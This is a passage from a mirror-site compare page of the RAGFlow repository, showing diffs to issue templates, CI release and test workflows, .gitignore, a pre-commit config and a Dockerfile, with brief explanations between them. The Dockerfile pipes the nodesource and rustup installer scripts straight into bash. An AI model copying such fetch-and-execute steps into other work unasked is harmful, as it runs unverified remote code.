Mirror of https://github.com/infiniflow/ragflow.git, synced 2025-12-08 20:42:30 +08:00
Compare commits
3227 Commits
| 793e29f23a | |||
| 99be226c7c | |||
| 7ddb2f19be | |||
| c28f7b5d38 | |||
| 48607c3cfb | |||
| d15ba37313 | |||
| a553dc8dbd | |||
| eb27a4309e | |||
| 48e1534bf4 | |||
| e9d19c4684 | |||
| 8d6d7f6887 | |||
| a6e4b74d94 | |||
| a5aed2412f | |||
| 2810c60757 | |||
| 62afcf5ac8 | |||
| a74c755d83 | |||
| 7013d7f620 | |||
| de839fc3f0 | |||
| c6b6c748ae | |||
| ca5acc151a | |||
| 385dbe5ab5 | |||
| 3050a8cb07 | |||
| 9c77d367d0 | |||
| 5f03a4de11 | |||
| 290e5d958d | |||
| 9703633a57 | |||
| 7d3b68bb1e | |||
| c89f3c3cdb | |||
| 5d7f573379 | |||
| cab274f560 | |||
| 7059ec2298 | |||
| 674b3aeafd | |||
| 4c1476032d | |||
| 2af74cc494 | |||
| 38f0cc016f | |||
| 6874c6f3a7 | |||
| 8acc01a227 | |||
| 8c07992b6c | |||
| aee8b48d2f | |||
| daf215d266 | |||
| cdcc779705 | |||
| d589b0f568 | |||
| 9d60a84958 | |||
| aadb9cbec8 | |||
| 038822f3bd | |||
| ae501c58fa | |||
| 944776f207 | |||
| f1c98aad6b | |||
| ab06f502d7 | |||
| 6329339a32 | |||
| 84b39c60f6 | |||
| eb62c669ae | |||
| f69ff39fa0 |
.gitattributes (vendored): 3 changed lines

@@ -1 +1,2 @@
 *.sh text eol=lf
+docker/entrypoint.sh text eol=lf executable

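The added attribute pins LF line endings on the entrypoint script so a Windows checkout cannot corrupt it inside the Linux container. A quick way to confirm the attributes resolve as intended, assuming a local checkout of the repository:

    git check-attr text eol executable -- docker/entrypoint.sh
    # expected:
    #   docker/entrypoint.sh: text: set
    #   docker/entrypoint.sh: eol: lf
    #   docker/entrypoint.sh: executable: set

Note that executable is a custom attribute here: Git itself only interprets text and eol, but check-attr still reports it as set for any tooling that wants it.
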
.github/ISSUE_TEMPLATE/bug_report.yml (vendored): 30 changed lines

@@ -1,30 +1,36 @@
-name: Bug Report
+name: "🐞 Bug Report"
 description: Create a bug issue for RAGFlow
 title: "[Bug]: "
-labels: [bug]
+labels: ["🐞 bug"]
 body:
   - type: checkboxes
     attributes:
-      label: Is there an existing issue for the same bug?
-      description: Please check if an issue already exists for the bug you encountered.
+      label: Self Checks
+      description: "Please check the following in order to be responded in time :)"
       options:
-        - label: I have checked the existing issues.
+        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
           required: true
+        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: "Please do not modify this template :) and fill in all the required fields."
+          required: true
   - type: markdown
     attributes:
       value: "Please provide the following information to help us understand the issue."
   - type: input
     attributes:
-      label: Branch name
-      description: Enter the name of the branch where you encountered the issue.
-      placeholder: e.g., main
+      label: RAGFlow workspace code commit ID
+      description: Enter the commit ID associated with the issue.
+      placeholder: e.g., 26d3480e
     validations:
       required: true
   - type: input
     attributes:
-      label: Commit ID
-      description: Enter the commit ID associated with the issue.
-      placeholder: e.g., c3b2a1
+      label: RAGFlow image version
+      description: Enter the image version(shown in RAGFlow UI, `System` page) associated with the issue.
+      placeholder: e.g., 26d3480e(v0.13.0~174)
     validations:
       required: true
   - type: textarea

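Issue forms are plain YAML, so a stray indent silently breaks the template picker on GitHub. A minimal local sanity check, assuming yamllint (or any other YAML validator) is available:

    yamllint .github/ISSUE_TEMPLATE/bug_report.yml

The check-yaml pre-commit hook added further below covers the same ground automatically on every commit.
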
.github/ISSUE_TEMPLATE/feature_request.md (vendored): 10 deleted lines

@@ -1,10 +0,0 @@
----
-name: Feature request
-title: '[Feature Request]: '
-about: Suggest an idea for RAGFlow
-labels: ''
----
-
-**Summary**
-
-Description for this feature.

.github/ISSUE_TEMPLATE/feature_request.yml (vendored): 16 changed lines

@@ -1,14 +1,20 @@
-name: Feature request
+name: "💞 Feature request"
 description: Propose a feature request for RAGFlow.
 title: "[Feature Request]: "
-labels: [feature request]
+labels: ["💞 feature"]
 body:
   - type: checkboxes
     attributes:
-      label: Is there an existing issue for the same feature request?
-      description: Please check if an issue already exists for the feature you request.
+      label: Self Checks
+      description: "Please check the following in order to be responded in time :)"
       options:
-        - label: I have checked the existing issues.
+        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
+          required: true
+        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: "Please do not modify this template :) and fill in all the required fields."
           required: true
   - type: textarea
     attributes:

.github/ISSUE_TEMPLATE/question.yml (vendored): 17 changed lines

@@ -1,8 +1,21 @@
-name: Question
+name: "🙋♀️ Question"
 description: Ask questions on RAGFlow
 title: "[Question]: "
-labels: [question]
+labels: ["🙋♀️ question"]
 body:
+  - type: checkboxes
+    attributes:
+      label: Self Checks
+      description: "Please check the following in order to be responded in time :)"
+      options:
+        - label: I have searched for existing issues [search for existing issues](https://github.com/infiniflow/ragflow/issues), including closed ones.
+          required: true
+        - label: I confirm that I am using English to submit this report ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: Non-english title submitions will be closed directly ( 非英文标题的提交将会被直接关闭 ) ([Language Policy](https://github.com/infiniflow/ragflow/issues/5910)).
+          required: true
+        - label: "Please do not modify this template :) and fill in all the required fields."
+          required: true
   - type: markdown
     attributes:
       value: |

.github/workflows/release.yml (vendored, new file): 118 added lines

@@ -0,0 +1,118 @@
+name: release
+
+on:
+  schedule:
+    - cron: '0 13 * * *'  # This schedule runs every 13:00:00Z(21:00:00+08:00)
+  # The "create tags" trigger is specifically focused on the creation of new tags, while the "push tags" trigger is activated when tags are pushed, including both new tag creations and updates to existing tags.
+  create:
+    tags:
+      - "v*.*.*" # normal release
+      - "nightly" # the only one mutable tag
+
+# https://docs.github.com/en/actions/using-jobs/using-concurrency
+concurrency:
+  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  release:
+    runs-on: [ "self-hosted", "overseas" ]
+    steps:
+      - name: Ensure workspace ownership
+        run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
+
+      # https://github.com/actions/checkout/blob/v3/README.md
+      - name: Check out code
+        uses: actions/checkout@v4
+        with:
+          token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
+          fetch-depth: 0
+          fetch-tags: true
+
+      - name: Prepare release body
+        run: |
+          if [[ $GITHUB_EVENT_NAME == 'create' ]]; then
+            RELEASE_TAG=${GITHUB_REF#refs/tags/}
+            if [[ $RELEASE_TAG == 'nightly' ]]; then
+              PRERELEASE=true
+            else
+              PRERELEASE=false
+            fi
+            echo "Workflow triggered by create tag: $RELEASE_TAG"
+          else
+            RELEASE_TAG=nightly
+            PRERELEASE=true
+            echo "Workflow triggered by schedule"
+          fi
+          echo "RELEASE_TAG=$RELEASE_TAG" >> $GITHUB_ENV
+          echo "PRERELEASE=$PRERELEASE" >> $GITHUB_ENV
+          RELEASE_DATETIME=$(date --rfc-3339=seconds)
+          echo Release $RELEASE_TAG created from $GITHUB_SHA at $RELEASE_DATETIME > release_body.md
+
+      - name: Move the existing mutable tag
+        # https://github.com/softprops/action-gh-release/issues/171
+        run: |
+          git fetch --tags
+          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
+            # Determine if a given tag exists and matches a specific Git commit.
+            # actions/checkout@v4 fetch-tags doesn't work when triggered by schedule
+            if [ "$(git rev-parse -q --verify "refs/tags/$RELEASE_TAG")" = "$GITHUB_SHA" ]; then
+              echo "mutable tag $RELEASE_TAG exists and matches $GITHUB_SHA"
+            else
+              git tag -f $RELEASE_TAG $GITHUB_SHA
+              git push -f origin $RELEASE_TAG:refs/tags/$RELEASE_TAG
+              echo "created/moved mutable tag $RELEASE_TAG to $GITHUB_SHA"
+            fi
+          fi
+
+      - name: Create or overwrite a release
+        # https://github.com/actions/upload-release-asset has been replaced by https://github.com/softprops/action-gh-release
+        uses: softprops/action-gh-release@v2
+        with:
+          token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
+          prerelease: ${{ env.PRERELEASE }}
+          tag_name: ${{ env.RELEASE_TAG }}
+          # The body field does not support environment variable substitution directly.
+          body_path: release_body.md
+
+      # https://github.com/marketplace/actions/docker-login
+      - name: Login to Docker Hub
+        uses: docker/login-action@v3
+        with:
+          username: infiniflow
+          password: ${{ secrets.DOCKERHUB_TOKEN }}
+
+      # https://github.com/marketplace/actions/build-and-push-docker-images
+      - name: Build and push full image
+        uses: docker/build-push-action@v6
+        with:
+          context: .
+          push: true
+          tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}
+          file: Dockerfile
+          platforms: linux/amd64
+
+      # https://github.com/marketplace/actions/build-and-push-docker-images
+      - name: Build and push slim image
+        uses: docker/build-push-action@v6
+        with:
+          context: .
+          push: true
+          tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}-slim
+          file: Dockerfile
+          build-args: LIGHTEN=1
+          platforms: linux/amd64
+
+      - name: Build ragflow-sdk
+        if: startsWith(github.ref, 'refs/tags/v')
+        run: |
+          cd sdk/python && \
+          uv build
+
+      - name: Publish package distributions to PyPI
+        if: startsWith(github.ref, 'refs/tags/v')
+        uses: pypa/gh-action-pypi-publish@release/v1
+        with:
+          packages-dir: sdk/python/dist/
+          password: ${{ secrets.PYPI_API_TOKEN }}
+          verbose: true

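The detail worth noting is the mutable nightly tag: softprops/action-gh-release does not move an existing tag by itself (see the linked issue 171), so the workflow re-points the tag manually before publishing. A minimal sketch of the same logic for a local checkout, assuming an origin remote:

    git fetch --tags
    if [ "$(git rev-parse -q --verify refs/tags/nightly)" = "$(git rev-parse HEAD)" ]; then
        echo "nightly already points at HEAD"
    else
        git tag -f nightly                             # re-point the tag locally
        git push -f origin nightly:refs/tags/nightly   # force-move it on the remote
    fi
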
.github/workflows/tests.yml (vendored, new file): 175 added lines

@@ -0,0 +1,175 @@
+name: tests
+
+on:
+  push:
+    branches:
+      - 'main'
+      - '*.*.*'
+    paths-ignore:
+      - 'docs/**'
+      - '*.md'
+      - '*.mdx'
+  pull_request:
+    types: [ opened, synchronize, reopened, labeled ]
+    paths-ignore:
+      - 'docs/**'
+      - '*.md'
+      - '*.mdx'
+  schedule:
+    - cron: '0 16 * * *'  # This schedule runs every 16:00:00Z(00:00:00+08:00)
+
+# https://docs.github.com/en/actions/using-jobs/using-concurrency
+concurrency:
+  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  ragflow_tests:
+    name: ragflow_tests
+    # https://docs.github.com/en/actions/using-jobs/using-conditions-to-control-job-execution
+    # https://github.com/orgs/community/discussions/26261
+    if: ${{ github.event_name != 'pull_request' || contains(github.event.pull_request.labels.*.name, 'ci') }}
+    runs-on: [ "self-hosted", "debug" ]
+    steps:
+      # https://github.com/hmarr/debug-action
+      #- uses: hmarr/debug-action@v2
+
+      - name: Show who triggered this workflow
+        run: |
+          echo "Workflow triggered by ${{ github.event_name }}"
+
+      - name: Ensure workspace ownership
+        run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
+
+      # https://github.com/actions/checkout/issues/1781
+      - name: Check out code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+          fetch-tags: true
+
+      # https://github.com/astral-sh/ruff-action
+      - name: Static check with Ruff
+        uses: astral-sh/ruff-action@v3
+        with:
+          version: ">=0.11.x"
+          args: "check"
+
+      - name: Build ragflow:nightly-slim
+        run: |
+          RUNNER_WORKSPACE_PREFIX=${RUNNER_WORKSPACE_PREFIX:-$HOME}
+          sudo docker pull ubuntu:22.04
+          sudo docker build --progress=plain --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
+
+      - name: Build ragflow:nightly
+        run: |
+          sudo docker build --progress=plain --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
+
+      - name: Start ragflow:nightly-slim
+        run: |
+          echo -e "\nRAGFLOW_IMAGE=infiniflow/ragflow:nightly-slim" >> docker/.env
+          sudo docker compose -f docker/docker-compose.yml up -d
+
+      - name: Stop ragflow:nightly-slim
+        if: always()  # always run this step even if previous steps failed
+        run: |
+          sudo docker compose -f docker/docker-compose.yml down -v
+
+      - name: Start ragflow:nightly
+        run: |
+          echo -e "\nRAGFLOW_IMAGE=infiniflow/ragflow:nightly" >> docker/.env
+          sudo docker compose -f docker/docker-compose.yml up -d
+
+      - name: Run sdk tests against Elasticsearch
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
+            export HTTP_API_TEST_LEVEL=p3
+          else
+            export HTTP_API_TEST_LEVEL=p2
+          fi
+          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv pip install sdk/python && uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_sdk_api
+
+      - name: Run frontend api tests against Elasticsearch
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          cd sdk/python && UV_LINK_MODE=copy uv sync --python 3.10 --group test --frozen && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
+
+      - name: Run http api tests against Elasticsearch
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
+            export HTTP_API_TEST_LEVEL=p3
+          else
+            export HTTP_API_TEST_LEVEL=p2
+          fi
+          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_http_api
+
+      - name: Stop ragflow:nightly
+        if: always()  # always run this step even if previous steps failed
+        run: |
+          sudo docker compose -f docker/docker-compose.yml down -v
+
+      - name: Start ragflow:nightly
+        run: |
+          sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml up -d
+
+      - name: Run sdk tests against Infinity
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
+            export HTTP_API_TEST_LEVEL=p3
+          else
+            export HTTP_API_TEST_LEVEL=p2
+          fi
+          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && uv pip install sdk/python && DOC_ENGINE=infinity uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_sdk_api
+
+      - name: Run frontend api tests against Infinity
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          cd sdk/python && UV_LINK_MODE=copy uv sync --python 3.10 --group test --frozen && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
+
+      - name: Run http api tests against Infinity
+        run: |
+          export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
+          export HOST_ADDRESS=http://host.docker.internal:9380
+          until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
+            echo "Waiting for service to be available..."
+            sleep 5
+          done
+          if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
+            export HTTP_API_TEST_LEVEL=p3
+          else
+            export HTTP_API_TEST_LEVEL=p2
+          fi
+          UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen && DOC_ENGINE=infinity uv run --only-group test --no-default-groups pytest -s --tb=short --level=${HTTP_API_TEST_LEVEL} test/testcases/test_http_api
+
+      - name: Stop ragflow:nightly
+        if: always()  # always run this step even if previous steps failed
+        run: |
+          sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v

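The whole job can be reproduced on a workstation. A condensed sketch, assuming Docker and uv are installed, the repo root is the working directory, and the compose file publishes the API on port 9380 of the host (in CI the service is reached as http://host.docker.internal:9380 from inside the ragflow-server container instead):

    sudo docker build --progress=plain -f Dockerfile -t infiniflow/ragflow:nightly .
    echo -e "\nRAGFLOW_IMAGE=infiniflow/ragflow:nightly" >> docker/.env
    sudo docker compose -f docker/docker-compose.yml up -d
    until curl -s --connect-timeout 5 http://127.0.0.1:9380 > /dev/null; do sleep 5; done
    UV_LINK_MODE=copy uv sync --python 3.10 --only-group test --no-default-groups --frozen
    HOST_ADDRESS=http://127.0.0.1:9380 uv run --only-group test --no-default-groups \
        pytest -s --tb=short --level=p2 test/testcases/test_http_api
    sudo docker compose -f docker/docker-compose.yml down -v
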
.gitignore (vendored): 166 changed lines

@@ -27,3 +27,169 @@ Cargo.lock

 # Exclude the log folder
 docker/ragflow-logs/
+/flask_session
+/logs
+rag/res/deepdoc
+
+# Exclude sdk generated files
+sdk/python/ragflow.egg-info/
+sdk/python/build/
+sdk/python/dist/
+sdk/python/ragflow_sdk.egg-info/
+
+# Exclude dep files
+libssl*.deb
+tika-server*.jar*
+cl100k_base.tiktoken
+chrome*
+huggingface.co/
+nltk_data/
+
+# Exclude hash-like temporary files like 9b5ad71b2ce5302211f9c61530b329a4922fc6a4
+*[0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]*
+.lh/
+.venv
+docker/data
+
+
+#--------------------------------------------------#
+# The following was generated with gitignore.nvim: #
+#--------------------------------------------------#
+# Gitignore for the following technologies: Node
+
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+.pnpm-debug.log*
+
+# Diagnostic reports (https://nodejs.org/api/report.html)
+report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json
+
+# Runtime data
+pids
+*.pid
+*.seed
+*.pid.lock
+
+# Directory for instrumented libs generated by jscoverage/JSCover
+lib-cov
+
+# Coverage directory used by tools like istanbul
+coverage
+*.lcov
+
+# nyc test coverage
+.nyc_output
+
+# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)
+.grunt
+
+# Bower dependency directory (https://bower.io/)
+bower_components
+
+# node-waf configuration
+.lock-wscript
+
+# Compiled binary addons (https://nodejs.org/api/addons.html)
+build/Release
+
+# Dependency directories
+node_modules/
+jspm_packages/
+
+# Snowpack dependency directory (https://snowpack.dev/)
+web_modules/
+
+# TypeScript cache
+*.tsbuildinfo
+
+# Optional npm cache directory
+.npm
+
+# Optional eslint cache
+.eslintcache
+
+# Optional stylelint cache
+.stylelintcache
+
+# Microbundle cache
+.rpt2_cache/
+.rts2_cache_cjs/
+.rts2_cache_es/
+.rts2_cache_umd/
+
+# Optional REPL history
+.node_repl_history
+
+# Output of 'npm pack'
+*.tgz
+
+# Yarn Integrity file
+.yarn-integrity
+
+# dotenv environment variable files
+.env
+.env.development.local
+.env.test.local
+.env.production.local
+.env.local
+
+# parcel-bundler cache (https://parceljs.org/)
+.cache
+.parcel-cache
+
+# Next.js build output
+.next
+out
+
+# Nuxt.js build / generate output
+.nuxt
+dist
+
+# Gatsby files
+.cache/
+# Comment in the public line in if your project uses Gatsby and not Next.js
+# https://nextjs.org/blog/next-9-1#public-directory-support
+# public
+
+# vuepress build output
+.vuepress/dist
+
+# vuepress v2.x temp and cache directory
+.temp
+
+# Docusaurus cache and generated files
+.docusaurus
+
+# Serverless directories
+.serverless/
+
+# FuseBox cache
+.fusebox/
+
+# DynamoDB Local files
+.dynamodb/
+
+# TernJS port file
+.tern-port
+
+# Stores VSCode versions used for testing VSCode extensions
+.vscode-test
+
+# yarn v2
+.yarn/cache
+.yarn/unplugged
+.yarn/build-state.yml
+.yarn/install-state.gz
+.pnp.*
+
+# Serverless Webpack directories
+.webpack/
+
+# SvelteKit build / generate output
+.svelte-kit

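The ten-bracket glob is the one non-obvious entry: it matches hash-named cache files such as 9b5ad71b2ce5302211f9c61530b329a4922fc6a4, the name under which the Dockerfile stores cl100k_base.tiktoken. Git can show which pattern claims a given path:

    git check-ignore -v 9b5ad71b2ce5302211f9c61530b329a4922fc6a4
    # prints the .gitignore source line and the matching pattern for that path
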
.pre-commit-config.yaml (new file): 19 added lines

@@ -0,0 +1,19 @@
+repos:
+  - repo: https://github.com/pre-commit/pre-commit-hooks
+    rev: v4.6.0
+    hooks:
+      - id: check-yaml
+      - id: check-json
+      - id: end-of-file-fixer
+      - id: trailing-whitespace
+      - id: check-case-conflict
+      - id: check-merge-conflict
+      - id: mixed-line-ending
+      - id: check-symlinks
+
+  - repo: https://github.com/astral-sh/ruff-pre-commit
+    rev: v0.11.6
+    hooks:
+      - id: ruff
+        args: [ --fix ]
+      - id: ruff-format

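The hooks only run once each contributor registers them. Typical setup, assuming pre-commit is not yet installed:

    pipx install pre-commit       # or: pip install pre-commit
    pre-commit install            # wires the hooks into .git/hooks/pre-commit
    pre-commit run --all-files    # one-off run of check-yaml, ruff, ruff-format, etc.
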
Dockerfile: 217 changed lines

@@ -1,20 +1,213 @@
-FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
-USER root
-
-WORKDIR /ragflow
-
-ADD ./web ./web
-RUN cd ./web && npm i && npm run build
-
-ADD ./api ./api
-ADD ./conf ./conf
-ADD ./deepdoc ./deepdoc
-ADD ./rag ./rag
-
-ENV PYTHONPATH=/ragflow/
-ENV HF_ENDPOINT=https://hf-mirror.com
-
-ADD docker/entrypoint.sh ./entrypoint.sh
-RUN chmod +x ./entrypoint.sh
-
-ENTRYPOINT ["./entrypoint.sh"]
+# base stage
+FROM ubuntu:22.04 AS base
+USER root
+SHELL ["/bin/bash", "-c"]
+
+ARG NEED_MIRROR=0
+ARG LIGHTEN=0
+ENV LIGHTEN=${LIGHTEN}
+
+WORKDIR /ragflow
+
+# Copy models downloaded via download_deps.py
+RUN mkdir -p /ragflow/rag/res/deepdoc /root/.ragflow
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
+    cp /huggingface.co/InfiniFlow/huqie/huqie.txt.trie /ragflow/rag/res/ && \
+    tar --exclude='.*' -cf - \
+        /huggingface.co/InfiniFlow/text_concat_xgb_v1.0 \
+        /huggingface.co/InfiniFlow/deepdoc \
+        | tar -xf - --strip-components=3 -C /ragflow/rag/res/deepdoc
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/huggingface.co,target=/huggingface.co \
+    if [ "$LIGHTEN" != "1" ]; then \
+        (tar -cf - \
+            /huggingface.co/BAAI/bge-large-zh-v1.5 \
+            /huggingface.co/maidalun1020/bce-embedding-base_v1 \
+            | tar -xf - --strip-components=2 -C /root/.ragflow) \
+    fi
+
+# https://github.com/chrismattmann/tika-python
+# This is the only way to run python-tika without internet access. Without this set, the default is to check the tika version and pull latest every time from Apache.
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
+    cp -r /deps/nltk_data /root/ && \
+    cp /deps/tika-server-standard-3.0.0.jar /deps/tika-server-standard-3.0.0.jar.md5 /ragflow/ && \
+    cp /deps/cl100k_base.tiktoken /ragflow/9b5ad71b2ce5302211f9c61530b329a4922fc6a4
+
+ENV TIKA_SERVER_JAR="file:///ragflow/tika-server-standard-3.0.0.jar"
+ENV DEBIAN_FRONTEND=noninteractive
+
+# Setup apt
+# Python package and implicit dependencies:
+# opencv-python: libglib2.0-0 libglx-mesa0 libgl1
+# aspose-slides: pkg-config libicu-dev libgdiplus libssl1.1_1.1.1f-1ubuntu2_amd64.deb
+# python-pptx: default-jdk tika-server-standard-3.0.0.jar
+# selenium: libatk-bridge2.0-0 chrome-linux64-121-0-6167-85
+# Building C extensions: libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev
+RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
+    if [ "$NEED_MIRROR" == "1" ]; then \
+        sed -i 's|http://ports.ubuntu.com|http://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
+        sed -i 's|http://archive.ubuntu.com|http://mirrors.tuna.tsinghua.edu.cn|g' /etc/apt/sources.list; \
+    fi; \
+    rm -f /etc/apt/apt.conf.d/docker-clean && \
+    echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache && \
+    chmod 1777 /tmp && \
+    apt update && \
+    apt --no-install-recommends install -y ca-certificates && \
+    apt update && \
+    apt install -y libglib2.0-0 libglx-mesa0 libgl1 && \
+    apt install -y pkg-config libicu-dev libgdiplus && \
+    apt install -y default-jdk && \
+    apt install -y libatk-bridge2.0-0 && \
+    apt install -y libpython3-dev libgtk-4-1 libnss3 xdg-utils libgbm-dev && \
+    apt install -y libjemalloc-dev && \
+    apt install -y python3-pip pipx nginx unzip curl wget git vim less && \
+    apt install -y ghostscript
+
+RUN if [ "$NEED_MIRROR" == "1" ]; then \
+        pip3 config set global.index-url https://mirrors.aliyun.com/pypi/simple && \
+        pip3 config set global.trusted-host mirrors.aliyun.com; \
+        mkdir -p /etc/uv && \
+        echo "[[index]]" > /etc/uv/uv.toml && \
+        echo 'url = "https://mirrors.aliyun.com/pypi/simple"' >> /etc/uv/uv.toml && \
+        echo "default = true" >> /etc/uv/uv.toml; \
+    fi; \
+    pipx install uv
+
+ENV PYTHONDONTWRITEBYTECODE=1 DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1
+ENV PATH=/root/.local/bin:$PATH
+
+# nodejs 12.22 on Ubuntu 22.04 is too old
+RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
+    curl -fsSL https://deb.nodesource.com/setup_20.x | bash - && \
+    apt purge -y nodejs npm cargo && \
+    apt autoremove -y && \
+    apt update && \
+    apt install -y nodejs
+
+# A modern version of cargo is needed for the latest version of the Rust compiler.
+RUN apt update && apt install -y curl build-essential \
+    && if [ "$NEED_MIRROR" == "1" ]; then \
+        # Use TUNA mirrors for rustup/rust dist files
+        export RUSTUP_DIST_SERVER="https://mirrors.tuna.tsinghua.edu.cn/rustup"; \
+        export RUSTUP_UPDATE_ROOT="https://mirrors.tuna.tsinghua.edu.cn/rustup/rustup"; \
+        echo "Using TUNA mirrors for Rustup."; \
+    fi; \
+    # Force curl to use HTTP/1.1
+    curl --proto '=https' --tlsv1.2 --http1.1 -sSf https://sh.rustup.rs | bash -s -- -y --profile minimal \
+    && echo 'export PATH="/root/.cargo/bin:${PATH}"' >> /root/.bashrc
+
+ENV PATH="/root/.cargo/bin:${PATH}"
+
+RUN cargo --version && rustc --version
+
+# Add msssql ODBC driver
+# macOS ARM64 environment, install msodbcsql18.
+# general x86_64 environment, install msodbcsql17.
+RUN --mount=type=cache,id=ragflow_apt,target=/var/cache/apt,sharing=locked \
+    curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - && \
+    curl https://packages.microsoft.com/config/ubuntu/22.04/prod.list > /etc/apt/sources.list.d/mssql-release.list && \
+    apt update && \
+    arch="$(uname -m)"; \
+    if [ "$arch" = "arm64" ] || [ "$arch" = "aarch64" ]; then \
+        # ARM64 (macOS/Apple Silicon or Linux aarch64)
+        ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql18; \
+    else \
+        # x86_64 or others
+        ACCEPT_EULA=Y apt install -y unixodbc-dev msodbcsql17; \
+    fi || \
+    { echo "Failed to install ODBC driver"; exit 1; }
+
+
+# Add dependencies of selenium
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chrome-linux64-121-0-6167-85,target=/chrome-linux64.zip \
+    unzip /chrome-linux64.zip && \
+    mv chrome-linux64 /opt/chrome && \
